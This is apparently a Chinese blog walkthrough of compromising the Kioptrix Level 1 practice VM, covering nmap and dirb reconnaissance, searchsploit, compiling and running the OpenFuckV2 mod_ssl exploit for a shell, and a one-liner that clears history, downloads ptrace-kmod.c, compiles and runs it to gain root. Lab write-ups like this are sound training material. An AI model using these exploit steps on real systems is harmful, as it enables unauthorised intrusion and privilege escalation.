学习内容来自 B 站UP主泷羽sec,如涉及侵权马上删除文章。
笔记的只是方便各位师傅学习知识,以下网站只涉及学习内容,其他的都与本人无关,切莫逾越法律红线,否则后果自负。
修改靶机网络模式
Kioptrix: Level 1靶机的默认网络模式是桥接,在某些情况下,你希望将其修改为NAT模式,解决步骤如下:
- 关闭Kioptrix: Level 1 VM 并在VMWARE中移除网络适配器。
- 从 VMware 中移除 VM(注意并不是从磁盘删除)
- 浏览到 Kioptrix: Level 1 VMVM 的 VMX 文件的位置并用文本编辑器中开它。
- 删除所有以“ethernet0“开头的条目并保存更改。
- 然后重新导入虚拟机,并将增加网络设备器,并且其模式为NAT
探测靶机IP地址
arp-scan -l:命令用于在本地网络中进行 ARP 扫描,以发现连接在同一网络上的设备。具体来说,这个命令会发送 ARP 请求(地址解析协议请求)来扫描局域网,并列出网络中活跃的设备。-l 选项用于自动检测本地网络的子网,并执行扫描。
先将靶机关闭通过上方命令扫描设备,再开启靶机扫描一次,进行前后对比可探测出靶机ip
访问IP对应网址进行信息收集
网址中的链接或者地址可以尝试访问,也许有收获
使用nmap进行端口扫描
相关命令:
nmap -p- 192.168.159.138
指纹探测
nmap 192.168.159.138 -p 22,80,111,139,443,1024 -sV -sC -O --version-all命令解析:
- 目标:对 IP 地址
192.168.159.138进行端口扫描。 - 端口扫描:扫描指定的端口:
22,80,111,139,443, 和1024。 - 服务版本检测(-sV):检测这些端口上运行的服务及其版本信息。
- 默认脚本扫描(-sC):运行 Nmap 内置的脚本,进行常见的漏洞扫描和安全性检查。
- 操作系统检测(-O):尝试确定目标主机的操作系统。
- 全面的版本检测(-version-all):对所有可能的服务进行详细的版本探测,以获取更多信息。
注意:重复出现的信息大概率是有漏洞的
┌──(root㉿root)-[~]
└─# nmap 192.168.159.138 -p 22,80,111,139,443,1024 -sV -sC -O --version-all
Starting Nmap 7.93 ( https://nmap.org ) at 2024-12-08 21:26 CST
Nmap scan report for 192.168.159.138
Host is up (0.00021s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
|_sshv1: Server supports SSHv1
| ssh-hostkey:
| 1024 b8746cdbfd8be666e92a2bdf5e6f6486 (RSA1)
| 1024 8f8e5b81ed21abc180e157a33c85c471 (DSA)
|_ 1024 ed4ea94a0614ff1514ceda3a80dbe281 (RSA)
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
| http-methods:
|_ Potentially risky methods: TRACE
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 1024/tcp status
|_ 100024 1 1024/udp status
139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp open ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_ssl-date: 2024-12-08T14:28:58+00:00; +1h01m50s from scanner time.
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-09-26T09:32:06
|_Not valid after: 2010-09-26T09:32:06
|_http-title: 400 Bad Request
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_RC4_64_WITH_MD5
| SSL2_RC4_128_EXPORT40_WITH_MD5
| SSL2_DES_64_CBC_WITH_MD5
| SSL2_RC2_128_CBC_WITH_MD5
|_ SSL2_RC4_128_WITH_MD5
1024/tcp open status 1 (RPC #100024)
MAC Address: 00:0C:29:BE:E9:FC (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Network Distance: 1 hop
Host script results:
|_clock-skew: 1h01m49s
|_smb2-time: Protocol negotiation failed (SMB2)
|_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.48 seconds
利用nmap进行漏洞探测
nmap 192.168.159.138 -p 22,80,111,139,443,1024 --script=vuln命令解析:
- 目标扫描:对 IP 地址
192.168.159.138执行端口扫描。 - 扫描端口:扫描的端口包括:
22(SSH)、80(HTTP)、111(RPC)、139(NetBIOS)、443(HTTPS)、1024(常见的高端端口)。 - 漏洞扫描:使用 Nmap 内置的
vuln类别脚本进行漏洞扫描,检查目标是否存在已知漏洞。
┌──(root㉿root)-[~]
└─# nmap 192.168.159.138 -p 22,80,111,139,443,1024 --script=vuln
Starting Nmap 7.93 ( https://nmap.org ) at 2024-12-08 21:36 CST
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 192.168.159.138
Host is up (0.00056s latency).
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
|_http-trace: TRACE is enabled
| http-enum:
| /test.php: Test page
| /icons/: Potentially interesting directory w/ listing on 'apache/1.3.20'
| /manual/: Potentially interesting directory w/ listing on 'apache/1.3.20'
|_ /usage/: Potentially interesting folder
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
111/tcp open rpcbind
139/tcp open netbios-ssn
443/tcp open https
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_sslv2-drown: ERROR: Script execution failed (use -d to debug)
| ssl-ccs-injection:
| VULNERABLE:
| SSL/TLS MITM vulnerability (CCS Injection)
| State: VULNERABLE
| Risk factor: High
| OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h
| does not properly restrict processing of ChangeCipherSpec messages,
| which allows man-in-the-middle attackers to trigger use of a zero
| length master key in certain OpenSSL-to-OpenSSL communications, and
| consequently hijack sessions or obtain sensitive information, via
| a crafted TLS handshake, aka the "CCS Injection" vulnerability.
|
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224
| http://www.cvedetails.com/cve/2014-0224
|_ http://www.openssl.org/news/secadv_20140605.txt
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| ssl-poodle:
| VULNERABLE:
| SSL POODLE information leak
| State: VULNERABLE
| IDs: CVE:CVE-2014-3566 BID:70574
| The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
| products, uses nondeterministic CBC padding, which makes it easier
| for man-in-the-middle attackers to obtain cleartext data via a
| padding-oracle attack, aka the "POODLE" issue.
| Disclosure date: 2014-10-14
| Check results:
| TLS_RSA_WITH_3DES_EDE_CBC_SHA
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
| https://www.imperialviolet.org/2014/10/14/poodle.html
| https://www.openssl.org/~bodo/ssl-poodle.pdf
|_ https://www.securityfocus.com/bid/70574
| ssl-dh-params:
| VULNERABLE:
| Transport Layer Security (TLS) Protocol DHE_EXPORT Ciphers Downgrade MitM (Logjam)
| State: VULNERABLE
| IDs: CVE:CVE-2015-4000 BID:74733
| The Transport Layer Security (TLS) protocol contains a flaw that is
| triggered when handling Diffie-Hellman key exchanges defined with
| the DHE_EXPORT cipher. This may allow a man-in-the-middle attacker
| to downgrade the security of a TLS session to 512-bit export-grade
| cryptography, which is significantly weaker, allowing the attacker
| to more easily break the encryption and monitor or tamper with
| the encrypted stream.
| Disclosure date: 2015-5-19
| Check results:
| EXPORT-GRADE DH GROUP 1
| Cipher Suite: TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA
| Modulus Type: Safe prime
| Modulus Source: mod_ssl 2.0.x/512-bit MODP group with safe prime modulus
| Modulus Length: 512
| Generator Length: 8
| Public Key Length: 512
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4000
| https://www.securityfocus.com/bid/74733
| https://weakdh.org
|
| Diffie-Hellman Key Exchange Insufficient Group Strength
| State: VULNERABLE
| Transport Layer Security (TLS) services that use Diffie-Hellman groups
| of insufficient strength, especially those using one of a few commonly
| shared groups, may be susceptible to passive eavesdropping attacks.
| Check results:
| WEAK DH GROUP 1
| Cipher Suite: TLS_DHE_RSA_WITH_DES_CBC_SHA
| Modulus Type: Safe prime
| Modulus Source: mod_ssl 2.0.x/1024-bit MODP group with safe prime modulus
| Modulus Length: 1024
| Generator Length: 8
| Public Key Length: 1024
| References:
|_ https://weakdh.org
|_http-aspnet-debug: ERROR: Script execution failed (use -d to debug)
1024/tcp open kdm
MAC Address: 00:0C:29:BE:E9:FC (VMware)
Host script results:
|_smb-vuln-ms10-054: false
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: ERROR: Server returned less data than it was supposed to (one or more fields are missing); aborting [14]
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: ERROR: Server returned less data than it was supposed to (one or more fields are missing); aborting [14]
| smb-vuln-cve2009-3103:
| VULNERABLE:
| SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)
| State: VULNERABLE
| IDs: CVE:CVE-2009-3103
| Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2,
| Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a
| denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE
| PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location,
| aka "SMBv2 Negotiation Vulnerability."
|
| Disclosure date: 2009-09-08
| References:
| http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
Nmap done: 1 IP address (1 host up) scanned in 340.54 seconds
利用dirb工具进行目录枚举
dirb http://192.168.159.138/┌──(root㉿root)-[~]
└─# dirb http://192.168.159.138/
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sun Dec 8 21:43:27 2024
URL_BASE: http://192.168.159.138/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.159.138/ ----
+ http://192.168.159.138/~operator (CODE:403|SIZE:273)
+ http://192.168.159.138/~root (CODE:403|SIZE:269)
+ http://192.168.159.138/cgi-bin/ (CODE:403|SIZE:272)
+ http://192.168.159.138/index.html (CODE:200|SIZE:2890)
==> DIRECTORY: http://192.168.159.138/manual/
==> DIRECTORY: http://192.168.159.138/mrtg/
==> DIRECTORY: http://192.168.159.138/usage/
---- Entering directory: http://192.168.159.138/manual/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.159.138/mrtg/ ----
+ http://192.168.159.138/mrtg/index.html (CODE:200|SIZE:17318)
---- Entering directory: http://192.168.159.138/usage/ ----
+ http://192.168.159.138/usage/index.html (CODE:200|SIZE:4253)
-----------------
END_TIME: Sun Dec 8 21:43:52 2024
DOWNLOADED: 13836 - FOUND: 6敏感目录
http://192.168.159.138/manual/
http://192.168.159.138/mrtg/
http://192.168.159.138/usage/
http://192.168.159.138/usage/index.html
翻翻目录文件中是否有什么信息泄露
利用工具searchsploit查找相关漏洞与exp
查看nmap漏洞扫描信息发现Apache 1.3.20
searchsploit Apache 1.3.20┌──(root㉿root)-[~]
└─# searchsploit Apache 1.3.20
---------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------- ---------------------------------
Apache + PHP < 5.3.12 / < 5.4.2 - cgi-bin Rem | php/remote/29290.c
Apache + PHP < 5.3.12 / < 5.4.2 - Remote Code | php/remote/29316.py
Apache 1.3.20 (Win32) - 'PHP.exe' Remote File | windows/remote/21204.txt
Apache 1.3.6/1.3.9/1.3.11/1.3.12/1.3.20 - Roo | windows/remote/19975.pl
Apache 1.3.x < 2.0.48 mod_userdir - Remote Us | linux/remote/132.c
Apache < 1.3.37/2.0.59/2.2.3 mod_rewrite - Re | multiple/remote/2237.sh
Apache < 2.0.64 / < 2.2.21 mod_setenvif - Int | linux/dos/41769.txt
Apache < 2.2.34 / < 2.4.27 - OPTIONS Memory L | linux/webapps/42745.py
Apache CouchDB < 2.1.0 - Remote Code Executio | linux/webapps/44913.py
Apache CXF < 2.5.10/2.6.7/2.7.4 - Denial of S | multiple/dos/26710.txt
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuck.c' | unix/remote/21671.c
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2. | unix/remote/47080.c
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2. | unix/remote/764.c
Apache Struts < 1.3.10 / < 2.3.16.2 - ClassLo | multiple/remote/41690.rb
Apache Struts < 2.2.0 - Remote Command Execut | multiple/remote/17691.rb
Apache Tika-server < 1.18 - Command Injection | windows/remote/46540.py
Apache Tomcat < 5.5.17 - Remote Directory Lis | multiple/remote/2061.txt
Apache Tomcat < 6.0.18 - 'utf8' Directory Tra | multiple/remote/6229.txt
Apache Tomcat < 6.0.18 - 'utf8' Directory Tra | unix/remote/14489.c
Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8 | jsp/webapps/42966.py
Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8 | windows/webapps/42953.txt
Apache Xerces-C XML Parser < 3.1.2 - Denial o | linux/dos/36906.txt
Oracle Java JDK/JRE < 1.8.0.131 / Apache Xerc | php/dos/44057.md
Webfroot Shoutbox < 2.32 (Apache) - Local Fil | linux/remote/34.pl
---------------------------------------------- ---------------------------------
Shellcodes: No Results
这里可以利用AI帮助分析有哪些可利用的exp
发现利用脚本mod_ssl
searchsploit mod_ssl
┌──(root㉿root)-[~]
└─# searchsploit mod_ssl
---------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------- ---------------------------------
Apache mod_ssl 2.0.x - Remote Denial of Servi | linux/dos/24590.txt
Apache mod_ssl 2.8.x - Off-by-One HTAccess Bu | multiple/dos/21575.txt
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuck.c' | unix/remote/21671.c
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2. | unix/remote/47080.c
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2. | unix/remote/764.c
Apache mod_ssl OpenSSL < 0.9.6d / < 0.9.7-bet | unix/remote/40347.txt
---------------------------------------------- ---------------------------------
Shellcodes: No Results
这里可以排除dos,因为dos漏洞最终结果是类似于DDOS让服务器瘫痪
建议其他的全尝试一遍,到https://www.exploit-db.com/
下载
搜索mod_ssl
下载 Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (2)
将下载文件拖入到kali中
gcc -o 470 47080.c (因为是c exp要编译 gcc编译 文件 -o命名为 470文件 要编译的文件 47080.c )
执行
gcc -o 470 47080.c -lcrypto ( -lcrypto这个需要换源下载 下载命令 sudo apt-get install libssl-dev )
┌──(root㉿root)-[~/桌面]
└─# gcc -o 470 47080.c -lcrypto
47080.c: In function ‘read_ssl_packet’:
47080.c:534:17: warning: ‘RC4’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]
534 | RC4(ssl->rc4_read_key, rec_len, buf, buf);
| ^~~
In file included from 47080.c:26:
/usr/include/openssl/rc4.h:37:28: note: declared here
37 | OSSL_DEPRECATEDIN_3_0 void RC4(RC4_KEY *key, size_t len,
| ^~~
47080.c: In function ‘send_ssl_packet’:
47080.c:583:17: warning: ‘MD5_Init’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]
583 | MD5_Init(&ctx);
| ^~~~~~~~
In file included from 47080.c:27:
/usr/include/openssl/md5.h:49:27: note: declared here
49 | OSSL_DEPRECATEDIN_3_0 int MD5_Init(MD5_CTX *c);
| ^~~~~~~~
47080.c:584:17: warning: ‘MD5_Update’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]
584 | MD5_Update(&ctx, ssl->write_key, RC4_KEY_LENGTH);
| ^~~~~~~~~~
/usr/include/openssl/md5.h:50:27: note: declared here
50 | OSSL_DEPRECATEDIN_3_0 int MD5_Update(MD5_CTX *c, const void *data, size_t len);
| ^~~~~~~~~~
47080.c:585:17: warning: ‘MD5_Update’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]
585 | MD5_Update(&ctx, rec, rec_len);
| ^~~~~~~~~~
/usr/include/openssl/md5.h:50:27: note: declared here
50 | OSSL_DEPRECATEDIN_3_0 int MD5_Update(MD5_CTX *c, const void *data, size_t len);
| ^~~~~~~~~~
47080.c:586:17: warning: ‘MD5_Update’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]
586 | MD5_Update(&ctx, &seq, 4);
| ^~~~~~~~~~
/usr/include/openssl/md5.h:50:27: note: declared here
50 | OSSL_DEPRECATEDIN_3_0 int MD5_Update(MD5_CTX *c, const void *data, size_t len);
| ^~~~~~~~~~
47080.c:587:17: warning: ‘MD5_Final’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]
587 | MD5_Final(p, &ctx);
| ^~~~~~~~~
/usr/include/openssl/md5.h:51:27: note: declared here
51 | OSSL_DEPRECATEDIN_3_0 int MD5_Final(unsigned char *md, MD5_CTX *c);
| ^~~~~~~~~
47080.c:594:17: warning: ‘RC4’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]
594 | RC4(ssl->rc4_write_key, tot_len, &buf[2], &buf[2]);
| ^~~
/usr/include/openssl/rc4.h:37:28: note: declared here
37 | OSSL_DEPRECATEDIN_3_0 void RC4(RC4_KEY *key, size_t len,
| ^~~
47080.c: In function ‘send_client_master_key’:
47080.c:748:9: warning: ‘EVP_PKEY_get1_RSA’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]
748 | if (EVP_PKEY_get1_RSA(pkey) == NULL) {
| ^~
In file included from /usr/include/openssl/x509.h:29,
from /usr/include/openssl/ssl.h:32,
from 47080.c:21:
/usr/include/openssl/evp.h:1358:16: note: declared here
1358 | struct rsa_st *EVP_PKEY_get1_RSA(EVP_PKEY *pkey);
| ^~~~~~~~~~~~~~~~~
47080.c:754:9: warning: ‘RSA_public_encrypt’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]
754 | encrypted_key_length = RSA_public_encrypt(RC4_KEY_LENGTH, ssl->master_key, &buf[10], EVP_PKEY_get1_RSA(pkey), RSA_PKCS1_PADDING);
| ^~~~~~~~~~~~~~~~~~~~
In file included from /usr/include/openssl/x509.h:36:
/usr/include/openssl/rsa.h:293:5: note: declared here
293 | int RSA_public_encrypt(int flen, const unsigned char *from, unsigned char *to,
| ^~~~~~~~~~~~~~~~~~
47080.c:754:9: warning: ‘EVP_PKEY_get1_RSA’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]
754 | encrypted_key_length = RSA_public_encrypt(RC4_KEY_LENGTH, ssl->master_key, &buf[10], EVP_PKEY_get1_RSA(pkey), RSA_PKCS1_PADDING);
| ^~~~~~~~~~~~~~~~~~~~
/usr/include/openssl/evp.h:1358:16: note: declared here
1358 | struct rsa_st *EVP_PKEY_get1_RSA(EVP_PKEY *pkey);
| ^~~~~~~~~~~~~~~~~
47080.c: In function ‘generate_key_material’:
47080.c:791:17: warning: ‘MD5_Init’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]
791 | MD5_Init(&ctx);
| ^~~~~~~~
/usr/include/openssl/md5.h:49:27: note: declared here
49 | OSSL_DEPRECATEDIN_3_0 int MD5_Init(MD5_CTX *c);
| ^~~~~~~~
47080.c:793:17: warning: ‘MD5_Update’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]
793 | MD5_Update(&ctx,ssl->master_key,RC4_KEY_LENGTH);
| ^~~~~~~~~~
/usr/include/openssl/md5.h:50:27: note: declared here
50 | OSSL_DEPRECATEDIN_3_0 int MD5_Update(MD5_CTX *c, const void *data, size_t len);
| ^~~~~~~~~~
47080.c:794:17: warning: ‘MD5_Update’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]
794 | MD5_Update(&ctx,&c,1);
| ^~~~~~~~~~
/usr/include/openssl/md5.h:50:27: note: declared here
50 | OSSL_DEPRECATEDIN_3_0 int MD5_Update(MD5_CTX *c, const void *data, size_t len);
| ^~~~~~~~~~
47080.c:796:17: warning: ‘MD5_Update’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]
796 | MD5_Update(&ctx,ssl->challenge,CHALLENGE_LENGTH);
| ^~~~~~~~~~
/usr/include/openssl/md5.h:50:27: note: declared here
50 | OSSL_DEPRECATEDIN_3_0 int MD5_Update(MD5_CTX *c, const void *data, size_t len);
| ^~~~~~~~~~
47080.c:797:17: warning: ‘MD5_Update’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]
797 | MD5_Update(&ctx,ssl->conn_id, ssl->conn_id_length);
| ^~~~~~~~~~
/usr/include/openssl/md5.h:50:27: note: declared here
50 | OSSL_DEPRECATEDIN_3_0 int MD5_Update(MD5_CTX *c, const void *data, size_t len);
| ^~~~~~~~~~
47080.c:798:17: warning: ‘MD5_Final’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]
798 | MD5_Final(km,&ctx);
| ^~~~~~~~~
/usr/include/openssl/md5.h:51:27: note: declared here
51 | OSSL_DEPRECATEDIN_3_0 int MD5_Final(unsigned char *md, MD5_CTX *c);
| ^~~~~~~~~
47080.c: In function ‘generate_session_keys’:
47080.c:807:9: warning: ‘RC4_set_key’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]
807 | RC4_set_key(ssl->rc4_read_key, RC4_KEY_LENGTH, ssl->read_key);
| ^~~~~~~~~~~
/usr/include/openssl/rc4.h:35:28: note: declared here
35 | OSSL_DEPRECATEDIN_3_0 void RC4_set_key(RC4_KEY *key, int len,
| ^~~~~~~~~~~
47080.c:811:9: warning: ‘RC4_set_key’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]
811 | RC4_set_key(ssl->rc4_write_key, RC4_KEY_LENGTH, ssl->write_key);
| ^~~~~~~~~~~
/usr/include/openssl/rc4.h:35:28: note: declared here
35 | OSSL_DEPRECATEDIN_3_0 void RC4_set_key(RC4_KEY *key, int len,
./470 | grep "1.3.20"命令解析:先是运行当前目录下的470文件(其功能未知),再通过grep工具筛选出包含 “1.3.20” 的输出行,展示的结果是不同操作系统环境下使用apache-1.3.20版本的相关配置情况,各系统以编号加对应描述形式呈现
┌──(root㉿root)-[~/桌面]
└─# ./470 | grep "1.3.20"
0x02 - Cobalt Sun 6.0 (apache-1.3.20)
0x27 - FreeBSD (apache-1.3.20)
0x28 - FreeBSD (apache-1.3.20)
0x29 - FreeBSD (apache-1.3.20+2.8.4)
0x2a - FreeBSD (apache-1.3.20_1)
0x3a - Mandrake Linux 7.2 (apache-1.3.20-5.1mdk)
0x3b - Mandrake Linux 7.2 (apache-1.3.20-5.2mdk)
0x3f - Mandrake Linux 8.1 (apache-1.3.20-3)
0x6a - RedHat Linux 7.2 (apache-1.3.20-16)1
0x6b - RedHat Linux 7.2 (apache-1.3.20-16)2
0x7e - Slackware Linux 8.0 (apache-1.3.20)
0x86 - SuSE Linux 7.3 (apache-1.3.20)
注意:在nmap信息收集中出现了RedHat
执行exp链接 shell
./470 0x6b 192.168.158.138 -c 40 命令解释:
┌──(root㉿root)-[~/桌面]
└─# ./470 0x6b 192.168.159.138 -c 40
*******************************************************************
* OpenFuck v3.0.4-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena irc.brasnet.org *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************
Connection... 40 of 40
Establishing SSL connection
cipher: 0x4043808c ciphers: 0x80f8050
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$
bash-2.05$ unset HISTFILE; cd /tmp; wget https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c; gcc -o exploit ptrace-kmod.c -B /usr/bin; rm ptrace-kmod.c; ./exploit;
--10:36:50-- https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
=> `ptrace-kmod.c'
Connecting to dl.packetstormsecurity.net:443... connected!
Unable to establish SSL connection.
Unable to establish SSL connection.
gcc: ptrace-kmod.c: No such file or directory
gcc: No input files
rm: cannot remove `ptrace-kmod.c': No such file or directory
bash: ./exploit: No such file or directory
bash-2.05$
bash-2.05$
bash-2.05$ unset HISTFILE; cd /tmp; wget https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c; gcc -o exploit ptrace-kmod.c -B /usr/bin; rm ptrace-kmod.c; ./exploit;
根据以上信息提示可以提权脚本的下载地址
下载提权脚本:
wget https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
开启80端口监听:
sudo python -m http.server 80:用于查看是否提权成功
wget http://192.168.159.131:80/ptrace-kmod.c
然后用exit退出
再用sudo ./470 0x6b 192.168.158.138 -c 40重新连接
┌──(root㉿root)-[~/桌面]
└─# sudo ./470 0x6b 192.168.159.138 -c 40
*******************************************************************
* OpenFuck v3.0.4-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena irc.brasnet.org *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************
Connection... 40 of 40
Establishing SSL connection
cipher: 0x4043808c ciphers: 0x80f81c8
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$
bash-2.05$ unset HISTFILE; cd /tmp; wget https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c; gcc -o exploit ptrace-kmod.c -B /usr/bin; rm ptrace-kmod.c; ./exploit;
--11:32:12-- https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
=> `ptrace-kmod.c.1'
Connecting to dl.packetstormsecurity.net:443... connected!
Unable to establish SSL connection.
Unable to establish SSL connection.
gcc: file path prefix `/usr/bin' never used
[+] Attached to 6757
[+] Signal caught
[+] Shellcode placed at 0x4001189d
[+] Now wait for suid shell...
ls
exploit
ls -l
total 21
-rwsr-sr-x 1 root root 19920 Dec 8 11:32 exploit
最后用ls -l查看自己权限为root,提权完成。
标签:Kioptrix,http,Level,OpenSSL,192.168,ssl,攻略,Apache,MD5 From: https://blog.csdn.net/m0_73863011/article/details/144279346